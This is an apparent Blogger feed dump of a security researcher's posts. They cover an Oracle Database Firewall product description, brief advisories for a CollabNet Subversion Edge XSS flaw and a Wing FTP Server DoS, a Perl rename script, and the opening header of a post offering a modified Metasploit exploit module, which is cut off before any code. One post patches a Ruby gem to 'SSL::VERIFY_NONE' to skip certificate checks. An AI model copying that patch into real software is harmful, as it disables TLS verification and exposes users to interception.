<p>Other service which I wish to access through msn is orkut (Social networking Site widely used in india). but twitter is in nomber one in my list. as I am habitual to use Echophone ( firefox plugin ) that keep me connected on twitter all the time without opening extra webpage & shows new tweets instantly.</p> <p>Msn can keep me updated on my facebook update & hotmail with twitter my online social requirement would be fulfilled. I don’t want to use any third party tool/plugin for this purpose due to performance & security reasons hope that Microsoft soon integrate the Twitter & orkut let’s cross the finger. </p> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-62569308451930710202010-12-10T04:26:00.001-08:002010-12-10T04:26:23.852-08:00Oracle Database Firewall<p> <p align="center"><font size="4">Oracle Database Firewall</font> <p><a href="http://www.oracle.com/us/products/database/database-firewall-160528.html">http://www.oracle.com/us/products/database/database-firewall-160528.html</a> <p><b>Cost Effective Protection for Oracle and non-Oracle Databases</b><br>Oracle Database Firewall, part of Oracle's <a href="http://www.oracle.com/us/products/database/security/index.html">comprehensive portfolio of database security solutions</a>, is the first line of defense for both Oracle and non-Oracle databases. It monitors database <b>activity on the network to</b> help prevent unauthorized access, SQL injections, privilege or role escalation, and other external and internal attacks - all in real time. Based on innovative SQL grammar technology that can reduce millions of SQL statement into a small number of SQL characteristics, Oracle Database Firewall offers unmatched accuracy, scalability, and performance. Enforcement of positive (white lists) and negative (black lists) security models provides protection from threats without time consuming and costly false positives. Oracle Database Firewall also enables organizations to address SOX, PCI, HIPAA/HITECH, and other regulatory requirements without changes to existing applications or databases, and demonstrate compliance with over a hundred built-in customizable reports. <table border="0" cellspacing="5" cellpadding="0"> <tbody> <tr> <td valign="top"> <h4>Oracle Database Firewall Key Features</h4></td></tr> <tr> <td> <p><a href="http://lh3.ggpht.com/_KqURyIY5WSM/TQIcVdbvZmI/AAAAAAAACYM/4L_wgUuQbtQ/s1600-h/clip_image001%5B3%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image001" border="0" alt="clip_image001" src="http://lh4.ggpht.com/_KqURyIY5WSM/TQIcWdzIZjI/AAAAAAAACYQ/nr6_EusWYgw/clip_image001_thumb.jpg?imgmax=800" width="244" height="6"></a></p></td></tr> <tr> <td valign="top" width="90"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/index-161576.html?ssSourceSiteId=otncn">Database Firewall for Security and Compliance</a></p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/firewall-whitelist-161577.html?ssSourceSiteId=otncn">White list, black list, exception list policies</a></p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p>3-click security policies</p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/firewall-models-161579.html?ssSourceSiteId=otncn">Safe, scalable deployment models</a></p></td></tr> <tr> <td valign="top"> </td> <td valign="top"> <p><a href="http://www.oracle.com/technetwork/database/database-firewall/firewall-reports-161580.html?ssSourceSiteId=otncn">Flexible reporting and alerting</a></p></td></tr></tbody></table> <h4>Database Firewall for Security and Compliance</h4> <p>Traditional network firewalls are an established technology and play an important role in protecting data centers from unauthorized access from the outside. Data center attacks, however, have grown increasingly sophisticated, leveraging porous perimeters on the inside to launch attacks on the database itself. <p>Examining SQL traffic and enforcing security policies on the network has emerged as an important addition to the defense-in-depth security architecture. This is specially true in heterogeneous database environments where security controls can not be enforced in the database itself. Oracle Database Firewall creates a defensive perimeter around databases, monitoring and enforcing normal application behavior, helping to prevent SQL injection attacks and attempts to access sensitive application data using unauthorized SQL commands. Oracle Database Firewall: <p>· Monitors and blocks SQL traffic on the network with white list, black list and exception list policies <p>· Protects against application bypass, SQL injection and similar threats <p>· Reports on database activity for SOX, PCI and other regulations, choosing from over 100 out-of-the-box reports <p>· Protects Oracle, SQL Server and Sybase databases <h4>White list, black list, exception list policies</h4> <p>Oracle Database Firewall examines the grammar of the SQL statements being sent to the database, analyzes their meaning, and determines the appropriate security policy to apply. This highly accurate approach provides a significantly higher degree of protection than first-generation database monitoring technologies that relied on recognizing the "signature" of known security threats. By enforcing normal application behavior, Oracle Database Firewall helps organizations avoid the costly and disruptive false positives and false negatives common with other approaches. Oracle Database Firewall recognizes SQL injection attacks on compromised applications and blocks them before they reach the database. <p><b><font size="3">3-click security policies</font></b> <p>Oracle Database Firewall supports white list, black list, and exception list policies. White list policies are simply the set of approved SQL commands that the firewall expects to see. These can be learned over time or imported from another Oracle Database Firewall. Black list policies are SQL commands that are not permitted to be sent to the database. Exception list polices provide additional deployment flexibility that can be used for one-off reporting or other special requirements. Policies can be enforced based on attributes including SQL category, time of day, applications, user, and IP addresses. <p><a href="http://lh4.ggpht.com/_KqURyIY5WSM/TQIcXNpBnYI/AAAAAAAACYU/zc_2NVcahDs/s1600-h/clip_image004%5B3%5D.gif"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image004" border="0" alt="clip_image004" src="http://lh3.ggpht.com/_KqURyIY5WSM/TQIcYKoYV_I/AAAAAAAACYY/fmPBhwFnGXU/clip_image004_thumb.gif?imgmax=800" width="240" height="91"></a> <p>Oracle Database Firewall can log the SQL command in question, block the SQL command, or substitute the incoming bad SQL request with an alternative SQL statement that, for example, simply returns no data, or returns a predetermined error message such as "no records found". This flexibility, combined with advanced SQL grammar analysis, enables organizations to spend more time doing what needs to be done and less time handling false alarms. <p><b>Safe, Scalable Deployment Models</b> <p>Oracle Database Firewall works on the network, transparent to database servers and applications, and can be quickly deployed. Customers can choose from several deployment models to meet their business requirements: <p>· Inline blocking and monitoring mode <p>· Inline monitoring-only mode <p>· Out-of-band monitoring mode <p>Oracle Database Firewall provides a centralized management console for monitoring multiple databases simultaneously and supports parallel devices for high availability deployments. Optional host-based agents can provide low-impact local monitoring capabilities. <p><a href="http://lh5.ggpht.com/_KqURyIY5WSM/TQIcZBOetUI/AAAAAAAACYc/F1ZpA1zl2dM/s1600-h/clip_image005%5B3%5D.jpg"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image005" border="0" alt="clip_image005" src="http://lh5.ggpht.com/_KqURyIY5WSM/TQIcZzoXI-I/AAAAAAAACYg/whDAiYOZYUE/clip_image005_thumb.jpg?imgmax=800" width="244" height="140"></a> <table border="0" cellspacing="5" cellpadding="0"> <tbody> <tr> <td valign="top"> </td></tr></tbody></table> <h4>Flexible reporting and alerting</h4> <p>Oracle Database Firewall includes over 125 prebuilt reports that can be easily customized for regulations such as PCI, HIPAA and SOX. Real-time alerts can also be setup for fast response to any policy exception. For privacy and compliance requirements, personally identifiable information contained in logged SQL can be masked. <p><a href="http://lh5.ggpht.com/_KqURyIY5WSM/TQIca17fEMI/AAAAAAAACYk/EfEQ-8am_ms/s1600-h/clip_image007%5B3%5D.gif"><img style="background-image: none; border-bottom: 0px; border-left: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="clip_image007" border="0" alt="clip_image007" src="http://lh3.ggpht.com/_KqURyIY5WSM/TQIcbvfa9FI/AAAAAAAACYo/d-magdSPieo/clip_image007_thumb.gif?imgmax=800" width="240" height="99"></a> Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-17844648558000473482010-09-16T05:15:00.000-07:002010-09-16T05:24:41.546-07:00CollabNet Subversion Edge Log Parser XSS/Code Injection VulnerabilityDiscovery Date: Sep 10, 2010<br />Risk: Important<br /><span style="font-weight:bold;">Description:</span><br /><br />There is a Cross Site Script (XSS) vulnerability that exists in CollabNet Subversion Edge 1.2 and prior versions. This said vulnerability can be exploited by sending a crafted request to the CollabNet Subversion. server. When an administrator tries to view the log file then this XSS Code will get executed.<br /><br />More information on this can be found on the following page:<br />https://ctf.open.collab.net/sf/sfmain/do/go/artf5016?returnUrlKey=1284577592506<br /><br /><b>Patch Information:</b><br /><br />More information on the patch can be found in the following page:<br />https://ctf.open.collab.net/sf/wiki/do/viewPage/projects.svnedge/wiki/Release_1.2.1<br /><br /><i>Discovered by: Sumit Kumar Soni, Trend Micro</i><div><i>Email: ssummit@gmail.com</i></div>Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-63202793834345459612010-06-20T23:42:00.000-07:002010-06-20T23:45:12.835-07:00Wing FTP Server PORT Command DoS VulnerabilityDiscovery Date: Nov 14, 2009<br />Risk: Important<br />Affected Software:<br /><br /> * Wing FTP Server 3.1.2<br /><br />Description:<br /><br />There is a Denial of Service (DoS) vulnerability that exists in Wing FTP Server 3.1.2. The said vulnerability can be exploited by using an invalid parameter for PORT command. When exploited successfully, the vulnerability could cause FTP server using the said software to crash.<br /><br />Wing FTP Server 3.1.2 on a Windows environment is affected. Other versions may also be affected.<br /><br />Patch Information:<br /><br />More information on the patch can be found in the following page:<br /><br /> * Wing FTP Server History<br /><br />Discovered by: Sumit Kumar Soni , Trend Micro<br />Email: ssummit @ gmail.com<br />Read more about this threat incident in the Malware Blog entry "Trend Micro Discovers Wing FTP Server PORT Command DoS Bug."Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-11730680107588836792010-04-29T05:34:00.000-07:002010-04-29T05:38:52.748-07:00Solution to avoid SSL Cert Verification in Ruby Soap4rJust add
<br /><meta equiv="Content-Type" content="text/html; charset=utf-8"><meta name="ProgId" content="Word.Document"><meta name="Generator" content="Microsoft Word 12"><meta name="Originator" content="Microsoft Word 12"><link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Cssoni%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"><!--[if gte mso 9]><xml> <o:officedocumentsettings> <o:allowpng/> <o:targetscreensize>1024x768</o:TargetScreenSize> </o:OfficeDocumentSettings> </xml><![endif]--><link rel="themeData" href="file:///C:%5CDOCUME%7E1%5Cssoni%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"><link rel="colorSchemeMapping" href="file:///C:%5CDOCUME%7E1%5Cssoni%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:trackmoves/> <w:trackformatting/> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:donotpromoteqf/> <w:lidthemeother>EN-US</w:LidThemeOther> <w:lidthemeasian>X-NONE</w:LidThemeAsian> <w:lidthemecomplexscript>X-NONE</w:LidThemeComplexScript> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> <w:splitpgbreakandparamark/> <w:dontvertaligncellwithsp/> <w:dontbreakconstrainedforcedtables/> <w:dontvertalignintxbx/> <w:word11kerningpairs/> <w:cachedcolbalance/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathpr> <m:mathfont val="Cambria Math"> <m:brkbin val="before"> <m:brkbinsub val="--"> <m:smallfrac val="off"> <m:dispdef/> <m:lmargin val="0"> <m:rmargin val="0"> <m:defjc val="centerGroup"> <m:wrapindent val="1440"> <m:intlim val="subSup"> <m:narylim val="undOvr"> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"> <w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"> <w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"> <w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"> <w:lsdexception locked="false" priority="39" name="toc 1"> <w:lsdexception locked="false" priority="39" name="toc 2"> <w:lsdexception locked="false" priority="39" name="toc 3"> <w:lsdexception locked="false" priority="39" name="toc 4"> <w:lsdexception locked="false" priority="39" name="toc 5"> <w:lsdexception locked="false" priority="39" name="toc 6"> <w:lsdexception locked="false" priority="39" name="toc 7"> <w:lsdexception locked="false" priority="39" name="toc 8"> <w:lsdexception locked="false" priority="39" name="toc 9"> <w:lsdexception locked="false" priority="35" qformat="true" name="caption"> <w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"> <w:lsdexception locked="false" priority="1" name="Default Paragraph Font"> <w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"> <w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"> <w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"> <w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"> <w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"> <w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"> <w:lsdexception locked="false" unhidewhenused="false" name="Revision"> <w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"> <w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"> <w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"> <w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"> <w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"> <w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"> <w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"> <w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"> <w:lsdexception locked="false" priority="37" name="Bibliography"> <w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"> </w:LatentStyles> </xml><![endif]--><style> <!-- /* Font Definitions */ @font-face {font-family:"Cambria Math"; panose-1:2 4 5 3 5 4 6 3 2 4; mso-font-charset:1; mso-generic-font-family:roman; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 0 0 0 0;} @font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1610611985 1073750139 0 0 159 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-unhide:no; mso-style-qformat:yes; mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-fareast-font-family:Calibri; mso-bidi-font-family:"Times New Roman";} .MsoChpDefault {mso-style-type:export-only; mso-default-props:yes; font-size:10.0pt; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} --> </style><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Calibri","sans-serif";} </style> <![endif]--> <p class="MsoNormal">@verify_mode = SSL::VERIFY_NONE
<br /></p><p class="MsoNormal">in C:\ruby\lib\ruby\gems\1.8\gems\httpclient-2.1.5.2\lib\httpclient\ssl_config.rb</p><p class="MsoNormal">
<br /></p><p class="MsoNormal">if you want to avoid following error.
<br /></p>
<br />at depth 0 - 18: self signed certificate
<br />c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:247:in `connect': certificate verify failed (OpenSSL::SSL::SSLError)
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:247:in `ssl_connect'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:639:in `connect'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/timeout.rb:128:in `timeout'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:631:in `connect'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:522:in `query'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:147:in `query'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient.rb:953:in `do_get_block'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient.rb:765:in `do_request'
<br /> ... 7 levels...
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/proxy.rb:143:in `call'
<br /> from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/driver.rb:181:in `call'
<br />
<br />Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-64955003180246220452010-04-25T03:17:00.000-07:002010-04-25T03:20:04.192-07:00Rename Multiple Files<span style="font-weight: bold;">Usage: rename perlexpr direpath</span><br /><br /><br />#!/usr/bin/perl -w<br />if($#ARGV !=1)<br />{<br /> print "Usage: rename perlexpr direpath\n";<br /> print "ex. rename s/exe/html c:/test";<br /> exit(0);<br />}<br />$regexp=shift ;<br />$dir=shift;<br />opendir(DIR, "$dir");<br />@files = readdir(DIR);<br />closedir(DIR);<br />foreach $_ (@files) {<br /> $file=$_;<br /> print "file-->$file\n";<br /> eval $regexp;<br /> die $@ if $@;<br /> $path="$dir/$file";<br /> print "$path\n";<br /> rename($path,"$dir/$_" ) unless $file eq $_;<br />}Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-9849753897038299372010-04-23T03:06:00.000-07:002010-04-23T03:14:42.437-07:00Whats wrong with MSF ms10_025_wmss_connect_funnel SploitLooks Like metasploit team added this exploit in the frame work in hurry . They are sending Current info & Transport info message in single packet that will never exploit the vulnerability ( Correct me).<br /><br />here is the modified Code that should work .<br /><br />##<br /># $Id: ms10_025_wmss_connect_funnel.rb 9101 2010-04-17 11:22:37Z swtornio $<br />##<br /><br />##<br /># This file is part of the Metasploit Framework and may be subject to<br /># redistribution and commercial restrictions. Please see the Metasploit<br 